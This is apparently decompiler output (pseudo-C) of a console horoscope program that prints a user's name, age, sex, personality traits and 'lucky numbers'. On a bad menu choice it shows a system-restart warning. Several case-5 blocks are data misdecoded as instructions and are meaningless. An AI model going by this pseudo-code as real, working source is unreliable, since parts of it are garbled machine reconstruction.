								 *((intOrPtr*)(__eax + 0x59)) =  *((intOrPtr*)(__eax + 0x59)) + __esi;
								__eflags = __eax - 0xec8b5501;
								_push(__ebp);
								__ebp = __esp;
								__esp = __esp - 0x14;
								_push(__ebx);
								_push(__esi);
								_push(__edi);
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__esi = _v48;
								_push(__esi);
								_push("Name: %s");
								 *0x13fe250 = 0x30037;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edi = _v52;
								0x7da = 0x7da - __edi;
								_push(0x7da);
								_push("Age=%d");
								 *0x13fe250 = 0x40037;
								_v76 = 0x7da - __edi;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__ebx = _v44;
								__eax = __bl;
								 *0x13fe250 = 0x50037;
								_push(E013DC111(__bl));
								_push("Sex=%c");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0x20 + __esp;
								__eax = E013D1940();
								_v84 = "\n*  You are usually filled with inherent contradiction.";
								_v80 = "\n*  You generally become interested in occult matters.";
								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 5;
								if(__eflags > 0) {
									L64:
									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax =  *0x13d0000();
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return __eax;
								} else {
									do {
										switch( *((intOrPtr*)(__eax * 4 +  &M013D61D0))) {
											case 0:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
												_push("HERE IS WHAT YOU ARE!!!\n");
												 *0x13fe250 = 0x90001;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = _v0;
												__esp = __esp + 0x10;
												 *0x13fe250 = 0xa0001;
												__eflags = __ecx - 0xa;
												if(__ecx <= 0xa) {
													_a4 = __ecx;
													__eax = __ecx;
												} else {
													__eax = 0x66666667;
													__edx = 0x66666667 * __ecx >> 0x20;
													__eax = 0x66666667 * __ecx;
													__edx = 0x66666667 * __ecx >> 0x20 >> 2;
													__eax = __edx + (__edx >> 0x1f);
													__edx = __eax + __eax * 4;
													__edx = __eax + __eax * 4 + __eax + __eax * 4;
													__eax = __ecx;
													__eax = __ecx - __edx;
													_a4 = __eax;
												}
												__eflags = __eax;
												if(__eax == 0) {
													_a4 = 5;
													__eax = _a4;
												}
												_a12 = __eax;
												__eax = __eax + __eax;
												__eax = __eax + __eax;
												__eflags = __eax;
												__eax = __ebp + __eax - 0x18;
												_v16 = 1;
												_v12 = __eax;
												while(1) {
													__eflags = _a12 - 0x28;
													if(__eflags > 0) {
														break;
													}
													__ecx = _v12;
													__edx =  *_v12;
													_push(__edx);
													_push("\n\n%s");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("\nEnter any key....");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = __esp + 0xc;
													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
													__ecx = _a4;
													_a12 = _a12 + __ecx;
													__eax = _v16;
													__ecx = __ecx + __ecx;
													_v12 = _v12 + __ecx;
													__eax =  &(_v16[0]);
													_v16 = __eax;
													__eflags = __eax - 6;
													if(__eflags < 0) {
														continue;
													}
													break;
												}
												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("\n\n\n\n\nEnter any key.....");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 8 + __esp;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L63;
											case 1:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
												goto L63;
											case 2:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x120005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__eax = _v0;
												__ecx = __eax * 8;
												_push(__eax * 8);
												_push("YOUR LUCKY NUMBERS ARE: %d\t");
												 *0x13fe250 = 0xe000a;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = _v0;
												__edx =  &(_v0[2]);
												_push(__edx);
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__eax = _v0;
												__eax = __eax << 4;
												(__eax << 4) - __eax = (__eax << 4) - __eax + (__eax << 4) - __eax;
												__ecx = (__eax << 4) - __eax + (__eax << 4) - __eax + (__eax << 4) - __eax + (__eax << 4) - __eax;
												__eax = 0x6bca1af3;
												__edx = 0x6bca1af3 * __ecx >> 0x20;
												__eax = 0x6bca1af3 * __ecx;
												__edx = 0x6bca1af3 * __ecx >> 0x20 >> 4;
												__edx = __edx >> 0x1f;
												__eax = __edx + (__edx >> 0x1f);
												_push(__edx + (__edx >> 0x1f));
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = _v0;
												__eax = 0x55555556;
												__edx = 0x55555556 * __ecx >> 0x20;
												0x55555556 * __ecx = __edx;
												__edx >> 0x1f = __edx + (__edx >> 0x1f);
												__eax = __edx + (__edx >> 0x1f) + __ecx;
												_push(__edx + (__edx >> 0x1f) + __ecx);
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("Enter any key to continue...");
												 *0x13fe250 = 0x160032;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 0x38 + __esp;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L63;
											case 3:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
												__eax = __eax - 1;
												__eflags = __eax - 0xb;
												if(__eflags <= 0) {
													switch( *((intOrPtr*)(__eax * 4 +  &M013D61E8))) {
														case 0:
															goto L50;
														case 1:
															goto L51;
														case 2:
															goto L52;
														case 3:
															goto L53;
														case 4:
															goto L54;
														case 5:
															goto L55;
														case 6:
															goto L56;
														case 7:
															goto L57;
														case 8:
															goto L58;
														case 9:
															goto L59;
														case 0xa:
															goto L60;
														case 0xb:
															goto L61;
													}
												}
												goto L63;
											case 4:
												_push(E013DB07D());
												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
												__esp = __esp + 4;
												goto L63;
											case 5:
												__eax = E013DC543(0);
												0x3d5c();
												 *((intOrPtr*)(__ecx - 0x7dfec2a4)) =  *((intOrPtr*)(__ecx - 0x7dfec2a4)) + __ebp;
												_pop(__ebp);
												__eflags = __eax - 0x3d612501;
												__edi = __edi + __eax;
												asm("popad");
												__eflags = __eax - 0x3d5db301;
												__ebp = __edi + __ebp;
												_pop(__ebp);
												__eflags = __eax - 0x3d5e4701;
												 *((intOrPtr*)(__ecx - 0x24fec2a2)) =  *((intOrPtr*)(__ecx - 0x24fec2a2)) + __edx;
												_pop(__esi);
												__eflags = __eax - 0x3d5f2501;
												__edi[0x17] = __edi[0x17] + __ebp;
												__eflags = __eax - 0x3d5fb901;
												 *__ebx =  *__ebx + __eax;
												asm("pushad");
												__eflags = __eax - 0x3d604d01;
												 *((intOrPtr*)(__edi - 0x21fec2a0)) =  *((intOrPtr*)(__edi - 0x21fec2a0)) + __edx;
												asm("pushad");
												__eflags = __eax - 0xcccccc01;
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(__ebp);
												__ebp = __esp;
												__esp = __esp - 0x14;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__esi = _v76;
												_push(__esi);
												_push("Name: %s");
												 *0x13fe250 = 0x30037;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edi = _v80;
												0x7da = 0x7da - __edi;
												_push(0x7da);
												_push("Age=%d");
												 *0x13fe250 = 0x40037;
												_v104 = 0x7da - __edi;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ebx = _v72;
												__eax = __bl;
												 *0x13fe250 = 0x50037;
												_push(E013DC111(__bl));
												_push("Sex=%c");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 0x20 + __esp;
												__eax = E013D19D0();
												_v112 = "\n*  You have an appetite for learning and travel.";
												_v108 = "\n*  You prefer to be footloose and fancy free.";
												__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
												__eax = __eax - 1;
												__eflags = __eax - 5;
												if(__eflags > 0) {
													L95:
													_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = __esp + 4;
													__eax =  *0x13d0000();
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													return __eax;
												} else {
													do {
														switch( *((intOrPtr*)(__eax * 4 +  &M013D68E4))) {
															case 0:
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																_push("HERE IS WHAT YOU ARE!!!\n");
																 *0x13fe250 = 0x80001;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__ecx = _v4;
																__esp = __esp + 0x10;
																 *0x13fe250 = 0x90001;
																__eflags = __ecx - 0xa;
																if(__ecx <= 0xa) {
																	_v0 = __ecx;
																	__eax = __ecx;
																} else {
																	__eax = 0x66666667;
																	__edx = 0x66666667 * __ecx >> 0x20;
																	__eax = 0x66666667 * __ecx;
																	__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																	__eax = __edx + (__edx >> 0x1f);
																	__edx = __eax + __eax * 4;
																	__edx = __eax + __eax * 4 + __eax + __eax * 4;
																	__eax = __ecx;
																	__eax = __ecx - __edx;
																	_v0 = __eax;
																}
																__eflags = __eax;
																if(__eax == 0) {
																	_v0 = 5;
																	__eax = _v0;
																}
																_a8 = __eax;
																__eax = __eax + __eax;
																__eax = __eax + __eax;
																__eflags = __eax;
																__eax = __ebp + __eax - 0x18;
																_v20 = 1;
																_v16 = __eax;
																while(1) {
																	__eflags = _a8 - 0x2b;
																	if(__eflags > 0) {
																		break;
																	}
																	__ecx = _v16;
																	__edx =  *_v16;
																	_push(__edx);
																	_push("\n\n%s");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	_push("\nEnter any key....");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	__esp = __esp + 0xc;
																	__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																	__ecx = _v0;
																	_a8 = _a8 + __ecx;
																	__eax = _v20;
																	__ecx = __ecx + __ecx;
																	_v16 = _v16 + __ecx;
																	__eax = _v20 + 1;
																	_v20 = __eax;
																	__eflags = __eax - 6;
																	if(__eflags < 0) {
																		continue;
																	}
																	break;
																}
																_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("\n\n\n\n\nEnter any key.....");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 8 + __esp;
																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																goto L94;
															case 1:
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																goto L94;
															case 2:
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__edx = __esi;
																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																_push("------------------------------------------------------------------");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("------------------------------------------------------------------");
																 *0x13fe250 = 0x100005;
																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v4;
																__eax = _v4 + _v4 * 8;
																_push(_v4 + _v4 * 8);
																_push("YOUR LUCKY NUMBERS ARE: %d\t");
																 *0x13fe250 = 0xc000a;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_v4 =  &(_v4[0]);
																_push( &(_v4[0]));
																_push("%d\t");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__ecx = _v4;
																__ecx = _v4 * 0x23;
																__eax = 0x88888889;
																__edx = 0x88888889 * __ecx >> 0x20;
																__eax = 0x88888889 * __ecx;
																__edx = (0x88888889 * __ecx >> 0x20) + __ecx;
																__edx = (0x88888889 * __ecx >> 0x20) + __ecx >> 3;
																__edx = __edx >> 0x1f;
																__eax = __edx + (__edx >> 0x1f);
																_push(__edx + (__edx >> 0x1f));
																_push("%d\t");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__ecx = _v4;
																__eax = __ecx;
																asm("cdq");
																__edx = __edx & 0x00000003;
																__edx + __ecx = __edx + __ecx >> 2;
																__eax = (__edx + __ecx >> 2) + __ecx;
																_push((__edx + __ecx >> 2) + __ecx);
																_push("%d\t");
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																_push("Enter any key to continue...");
																 *0x13fe250 = 0x160032;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__esp = 0x38 + __esp;
																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																goto L94;
															case 3:
																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																__edx = __esi;
																E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																__eax = __eax - 1;
																__eflags = __eax - 0xb;
																if(__eflags <= 0) {
																	switch( *((intOrPtr*)(__eax * 4 +  &M013D68FC))) {
																		case 0:
																			goto L81;
																		case 1:
																			goto L82;
																		case 2:
																			goto L83;
																		case 3:
																			goto L84;
																		case 4:
																			goto L85;
																		case 5:
																			goto L86;
																		case 6:
																			goto L87;
																		case 7:
																			goto L88;
																		case 8:
																			goto L89;
																		case 9:
																			goto L90;
																		case 0xa:
																			goto L91;
																		case 0xb:
																			goto L92;
																	}
																}
																goto L94;
															case 4:
																_push(E013DB07D());
																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																__esp = __esp + 4;
																goto L94;
															case 5:
																__eax = E013DC543(0);
																__edx = 0xa4013d62;
																asm("arpl [0x3d63c901], di");
																_a939605336 = _a939605336 + 0xa4013d62;
																_push(0x68da013d);
																__eflags = __eax - 0x3d64c601;
																 *__eax = 0xa4013d62 +  *__eax;
																__eflags = __eax - 0x3d655a01;
																_a1710096689 = _a1710096689 + __esp;
																__eflags = __eax - 0x3d663801;
																 *0xFFFFFFFF70027AC8 =  *((intOrPtr*)(0xffffffff70027ac8)) + __eax;
																__eflags = __ax - 0x1601;
																asm("a16 cmp eax, 0x3d676001");
																 *0xFFFFFFFF95027AC9 =  *((intOrPtr*)(0xffffffff95027ac9)) + __ebp;
																asm("a16 cmp eax, 0xcccccc01");
																asm("int3");
																_push(__ebp);
																__ebp = __esp;
																__esp = __esp - 0x20;
																_push(__ebx);
																_push(__esi);
																__eax = E013DB418(__ebx, 0xa4013d62, __eflags, "cls");
																__esi = _v120;
																_push(__esi);
																_push("Name: %s");
																 *0x13fe250 = 0x30037;
																__eax = E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags);
																__ebx = _v124;
																0x7da = 0x7da - __ebx;
																_push(0x7da);
																_push("Age=%d");
																 *0x13fe250 = 0x40037;
																_v152 = 0x7da - __ebx;
																E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags) = _v116;
																 *0x13fe250 = 0x50037;
																_v156 = _v116;
																_push(E013DC111(_v116));
																_push("Sex=%c");
																__eax = E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags);
																__esp = 0x20 + __esp;
																__eax = E013D1A50();
																_v168 = "\n*  You are usually ambitious.";
																_v164 = "\n*  You marked by a purposeful pursuit of your destiny.";
																_v160 = "\n*  You have a sense of purpose and a great faith in your own ability.";
																__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																__eax = __eax - 1;
																__eflags = __eax - 5;
																if(__eflags > 0) {
																	L128:
																	_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																	__esp = __esp + 4;
																	__eax =  *0x13d0000();
																	_pop(__esi);
																	_pop(__ebx);
																	return __eax;
																} else {
																	_push(__edi);
																	__edi = _v8;
																	do {
																		switch( *((intOrPtr*)(__eax * 4 +  &M013D7038))) {
																			case 0:
																				E013DB418(__ebx, __edx, __eflags, "cls") = _a4;
																				__edx = __esi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D1A50();
																				_push("HERE IS WHAT YOU ARE!!!\n");
																				 *0x13fe250 = 0x80001;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = __esp + 0x10;
																				 *0x13fe250 = 0x90001;
																				__eflags = __edi - 0xa;
																				if(__edi <= 0xa) {
																					_v4 = __edi;
																					__eax = __edi;
																				} else {
																					__eax = 0x66666667;
																					__edx = 0x66666667 * __edi >> 0x20;
																					__eax = 0x66666667 * __edi;
																					__edx = 0x66666667 * __edi >> 0x20 >> 2;
																					__eax = __edx + (__edx >> 0x1f);
																					__edx = __eax + __eax * 4;
																					__edx = __eax + __eax * 4 + __eax + __eax * 4;
																					__eax = __edi;
																					__eax = __edi - __edx;
																					_v4 = __eax;
																				}
																				__eflags = __eax;
																				if(__eax == 0) {
																					_v4 = 5;
																					__eax = _v4;
																				}
																				_v20 = __eax;
																				__eax = __eax + __eax;
																				__eax = __eax + __eax;
																				__eflags = __eax;
																				__eax = __ebp + __eax - 0x24;
																				_v28 = 1;
																				_v24 = __eax;
																				while(1) {
																					__eflags = _v20 - 0x2e;
																					if(__eflags > 0) {
																						break;
																					}
																					__ecx = _v24;
																					__edx =  *_v24;
																					_push(__edx);
																					_push("\n\n%s");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					_push("\nEnter any key....");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					__esp = __esp + 0xc;
																					__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																					__ecx = _v4;
																					_v20 = _v20 + __ecx;
																					__eax = _v28;
																					__ecx = __ecx + __ecx;
																					_v24 =  &(_v24[__ecx]);
																					__eax =  &(_v28[1]);
																					_v28 = __eax;
																					__eflags = __eax - 6;
																					if(__eflags < 0) {
																						continue;
																					}
																					break;
																				}
																				_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("\n\n\n\n\nEnter any key.....");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 8 + __esp;
																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																				goto L126;
																			case 1:
																				E013DB418(__ebx, __edx, __eflags, "cls") = _a4;
																				__edx = __esi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D1A50();
																				__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																				goto L126;
																			case 2:
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__ecx = _a4;
																				__edx = __esi;
																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx) = E013D1A50();
																				_push("------------------------------------------------------------------");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("------------------------------------------------------------------");
																				 *0x13fe250 = 0x100005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx =  &(__edi[__edi]);
																				__edx =  &(__edi[__edi]) +  &(__edi[__edi]);
																				_push(__edx);
																				_push("YOUR LUCKY NUMBERS ARE: %d\t");
																				 *0x13fe250 = 0xc000a;
																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __edi;
																				asm("cdq");
																				__edx = __edx & 0x00000007;
																				__edi + __edx = __edi + __edx >> 3;
																				__eax = __edi + (__edi + __edx >> 3);
																				_push(__edi + (__edi + __edx >> 3));
																				_push("%d\t");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__ecx = __edi;
																				__ecx = __edi << 5;
																				__eax = 0x2aaaaaab;
																				__edx = 0x2aaaaaab * __ecx >> 0x20;
																				0x2aaaaaab * __ecx = __edx;
																				__edx >> 0x1f = __edx + (__edx >> 0x1f);
																				_push(__edx + (__edx >> 0x1f));
																				_push("%d\t");
																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
																				__edx = 0x66666667 * __edi >> 0x20;
																				__eax = 0x66666667 * __edi;
																				__edx = 0x66666667 * __edi >> 0x20 >> 1;
																				__edx = __edx >> 0x1f;
																				__eax = __edx + (__edx >> 0x1f);
																				__ecx = __eax + __eax * 4;
																				_push(__eax + __eax * 4);
																				_push("%d\t");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("Enter any key to continue...");
																				 *0x13fe250 = 0x160032;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 0x38 + __esp;
																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																				goto L126;
																			case 3:
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__ecx = _a4;
																				__edx = __esi;
																				E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ecx, __ebx) = E013D1A50();
																				__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																				__eax = __eax - 1;
																				__eflags = __eax - 0xb;
																				if(__eflags <= 0) {
																					switch( *((intOrPtr*)(__eax * 4 +  &M013D7050))) {
																						case 0:
																							goto L113;
																						case 1:
																							goto L114;
																						case 2:
																							goto L115;
																						case 3:
																							goto L116;
																						case 4:
																							goto L117;
																						case 5:
																							goto L118;
																						case 6:
																							goto L119;
																						case 7:
																							goto L120;
																						case 8:
																							goto L121;
																						case 9:
																							goto L122;
																						case 0xa:
																							goto L123;
																						case 0xb:
																							goto L124;
																					}
																				}
																				goto L126;
																			case 4:
																				_push(E013DB07D());
																				__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = __esp + 4;
																				goto L126;
																			case 5:
																				__eax = E013DC543(0);
																				asm("xlatb");
																				__edi =  *0x3d6ac201 * 0x3d6aea01;
																				 *((intOrPtr*)(__ebx + 0x6f86013d + __ebp * 2)) =  *((intOrPtr*)(__ebx + 0x6f86013d + __ebp * 2)) +  *0x3d6ac201 * 0x3d6aea01;
																				__eflags = __eax - 0x3d702f01;
																				__eax = __esi + __eax;
																				__edi =  *0x3d6c3d01;
																				__ch =  *((intOrPtr*)( &(__edi[0]) + __ebp));
																				asm("xlatb");
																				asm("insb");
																				__eflags = __eax - 0x3d6d2401;
																				 *((intOrPtr*)(__ecx + 0x6d)) =  *((intOrPtr*)(__ecx + 0x6d)) + __esi;
																				__eflags = __eax - 0x3d6dbe01;
																				 *__ebx =  *__ebx + __ecx;
																				asm("outsb");
																				__eflags = __eax - 0x3d6e5801;
																				_v234799778 = _v234799778 + __esp;
																				asm("outsb");
																				__eflags = __eax - 0x3d6f3c01;
																				_t333 =  &_v133;
																				 *_t333 = _v133 + __edx;
																				__eflags =  *_t333;
																				_push(__ebp);
																				__ebp = __esp;
																				__esp = __esp - 0x1c;
																				_push(__ebx);
																				_push(__esi);
																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																				__esi = _v172;
																				_push(__esi);
																				_push("Name: %s");
																				 *0x13fe250 = 0x30037;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__ebx = _v176;
																				0x7da = 0x7da - __ebx;
																				_push(0x7da);
																				_push("Age=%d");
																				 *0x13fe250 = 0x40037;
																				_v204 = 0x7da - __ebx;
																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v168;
																				 *0x13fe250 = 0x50037;
																				_v208 = _v168;
																				_push(E013DC111(_v168));
																				_push("Sex=%c");
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("Your horoscope sign is Aquarius-The Water Bearer");
																				 *0x13fe250 = 0x20003;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("..-\"-._.-\"-._.-");
																				 *0x13fe250 = 0x30005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				_push("..-\"-._.-\"-._.-\n\n");
																				 *0x13fe250 = 0x40005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__esp = 0x2c + __esp;
																				_v216 = "\n*  You have great desire for material gain.";
																				_v212 = "\n*  You are tireless worker and are willing to work for what you want.";
																				__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																				__eax = __eax - 1;
																				__eflags = __eax - 5;
																				if(__eflags > 0) {
																					L161:
																					_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eax =  *0x13d0000();
																					_pop(__esi);
																					_pop(__ebx);
																					return __eax;
																				} else {
																					_push(__edi);
																					__edi = _v12;
																					do {
																						switch( *((intOrPtr*)(__eax * 4 +  &M013D77F0))) {
																							case 0:
																								E013DB418(__ebx, __edx, __eflags, "cls") = _v0;
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1AD0();
																								_push("HERE IS WHAT YOU ARE!!!\n");
																								 *0x13fe250 = 0x80001;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = __esp + 0x10;
																								 *0x13fe250 = 0x90001;
																								__eflags = __edi - 0xa;
																								if(__edi <= 0xa) {
																									_v8 = __edi;
																									__eax = __edi;
																								} else {
																									__eax = 0x66666667;
																									__edx = 0x66666667 * __edi >> 0x20;
																									__eax = 0x66666667 * __edi;
																									__edx = 0x66666667 * __edi >> 0x20 >> 2;
																									__eax = __edx + (__edx >> 0x1f);
																									__edx = __eax + __eax * 4;
																									__edx = __eax + __eax * 4 + __eax + __eax * 4;
																									__eax = __edi;
																									__eax = __edi - __edx;
																									_v8 = __eax;
																								}
																								__eflags = __eax;
																								if(__eax == 0) {
																									_v8 = 5;
																									__eax = _v8;
																								}
																								_v24 = __eax;
																								__eax = __eax + __eax;
																								__eax = __eax + __eax;
																								__eflags = __eax;
																								__eax = __ebp + __eax - 0x20;
																								_v32 = 1;
																								_v28 = __eax;
																								while(1) {
																									__eflags = _v24 - 0x25;
																									if(__eflags > 0) {
																										break;
																									}
																									__ecx = _v28;
																									__edx =  *_v28;
																									_push(__edx);
																									_push("\n\n%s");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									_push("\nEnter any key....");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									__esp = __esp + 0xc;
																									__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																									__ecx = _v8;
																									_v24 =  &(_v24[__ecx]);
																									__eax = _v32;
																									__ecx = __ecx + __ecx;
																									_v28 =  &(_v28[__ecx]);
																									__eax =  &(_v32[1]);
																									_v32 = __eax;
																									__eflags = __eax - 6;
																									if(__eflags < 0) {
																										continue;
																									}
																									break;
																								}
																								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("\n\n\n\n\nEnter any key.....");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 8 + __esp;
																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																								goto L159;
																							case 1:
																								E013DB418(__ebx, __edx, __eflags, "cls") = _v0;
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1AD0();
																								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																								goto L159;
																							case 2:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__ecx = _v0;
																								__edx = __esi;
																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1AD0();
																								_push("------------------------------------------------------------------");
																								 *0x13fe250 = 0x80005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("------------------------------------------------------------------");
																								 *0x13fe250 = 0x100005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
